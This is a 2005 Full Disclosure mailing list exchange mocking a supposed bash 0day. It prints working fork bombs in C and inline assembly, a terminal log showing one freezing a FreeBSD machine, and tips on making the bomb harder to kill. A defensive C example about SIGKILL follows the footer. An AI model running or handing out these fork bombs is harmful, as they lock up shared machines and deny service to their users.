Full Disclosure mailing list archives
Re: bash vulnerability?
From: Jay <jaymzu () gmail com>
Date: Tue, 16 Aug 2005 12:45:03 +0300
┌(jay@xxx:p4)(~)
└(Power:on-line:100% cat > a.c
int main(){
__asm__(
"xorl %ecx,%ecx\n"
"cdq\n"
"HERE:\n"
"movl $0x2,%eax\n"
"int $0x80\n"
"jmp HERE\n"
);
}
^C
┌(jay@xxx:p4)(~)
└(130:Power:on-line:100% make a
cc -O -pipe -march=pentium4 a.c -o a
┌(jay@xxx:p4)(~)
└(Power:on-line:100% ./a
^C
┌(jay@xxx:p4)(~)
└(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386

the machine froze instantly but eventually, after a minute or so I was able to ^C

--
Jay

On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
On Monday 15 August 2005 09:59, Jay wrote:

    It's not nice to brag about finding 0-day bullshit in the bash fork bomb
    that has been Zalewski's signature for years :P

i think i know where he got it from.. i was on an irc channel a couple of days ago, and someone posted it (as a joke of course). it's ... ahm... funny that it comes back over here just a few days later!

i don't know how this is a 0day and gives you remote access (it does the opposite...) but if you want one that's a bit harder to stop:

c version:

    int main () { while (1) fork(); }

an asm (quick hack):

    int main(){
    __asm__(
    "xorl %ecx,%ecx\n"
    "cdq\n"
    "HERE:\n"
    "movl $0x2,%eax\n"
    "int $0x80\n"
    "jmp HERE\n"
    );
    }

sry it's in c... the machine i made it on didn't have gas or nasm.

anyway, if you compile this and run it in background, it will all die pretty fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL will still work, but it will be harder to kill :))

shall we call this C and assembler 0days? ;)

--
harry aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven be -=- http://harry.ulyssis.org

Disclaimer:
By sending an email to ANY of my addresses you are agreeing that:
1. I am by definition, "the intended recipient"
2. All information in the email is mine to do with as I see fit and make such financial profit, political mileage, or good joke as it lends itself to. In particular, I may quote it on usenet.
3. I may take the contents as representing the views of your company.
4. This overrides any disclaimer or statement of confidentiality that may be included on your message.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
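The quoted remark that SIGKILL still works against a process with its own signal handlers can be checked from the responder's side. The following is an added example, not code from the thread: it asks the kernel whether SIGTERM and SIGKILL may be ignored, then starts a single child that ignores SIGINT and SIGTERM and records which signal actually ends it. The function names `try_ignore` and `kill_stubborn_child` are made up for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Try to set SIG_IGN for signo; return 0 if accepted, else errno. */
int try_ignore(int signo) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = SIG_IGN;
    if (sigaction(signo, &sa, &old) == -1) return errno;
    sigaction(signo, &old, NULL);            /* restore old disposition */
    return 0;
}

/* Fork ONE child that ignores SIGINT/SIGTERM, signal it, and return the
   signal that finally ended it (-1 on error). *survived_term is set to 1
   if the child was still running after SIGTERM. */
int kill_stubborn_child(int *survived_term) {
    int fd[2], st; char c;
    struct timespec wait = {0, 200000000L};  /* 200 ms */
    if (pipe(fd) == -1) return -1;
    pid_t pid = fork();
    if (pid == -1) return -1;
    if (pid == 0) {                          /* child */
        signal(SIGINT, SIG_IGN);
        signal(SIGTERM, SIG_IGN);
        if (write(fd[1], "r", 1) != 1) _exit(1);   /* dispositions are set */
        for (;;) pause();
    }
    close(fd[1]);
    if (read(fd[0], &c, 1) != 1) return -1;
    close(fd[0]);
    kill(pid, SIGTERM);
    nanosleep(&wait, NULL);
    *survived_term = (waitpid(pid, &st, WNOHANG) == 0);
    kill(pid, SIGKILL);                      /* cannot be caught or ignored */
    if (waitpid(pid, &st, 0) != pid) return -1;
    return WIFSIGNALED(st) ? WTERMSIG(st) : -1;
}

int main(void) {
    int survived = 0, sig = kill_stubborn_child(&survived);
    printf("ignore SIGTERM: %d, ignore SIGKILL: %d (EINVAL=%d)\n",
           try_ignore(SIGTERM), try_ignore(SIGKILL), EINVAL);
    printf("survived SIGTERM: %d, ended by signal %d\n", survived, sig);
    return 0;
}
```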